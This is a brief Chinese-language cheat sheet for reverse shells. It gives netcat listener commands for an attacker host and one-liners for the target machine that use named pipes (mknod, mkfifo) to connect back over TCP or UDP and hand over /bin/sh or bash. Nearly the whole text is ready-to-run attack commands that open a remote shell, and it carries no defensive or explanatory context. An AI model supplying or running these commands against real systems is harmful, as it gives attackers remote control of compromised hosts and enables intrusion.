主機1監聽端口,主機2發起連接。
TCP shell
主機1:
nc -nvlp 4444
主機2:
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 主機1的IP 4444 1>/tmp/backpipe
如果第一步提示文件backpipe存在,且無法建立連接,則可以先把它刪了重試:
rm /tmp/backpipe
UDP shell
攻擊機:
nc -nuvlp 4444
靶機:
mkfifo fifo
nc -u 主機1的IP 4444 < fifo |
{
echo "Hi"
bash
} > fifo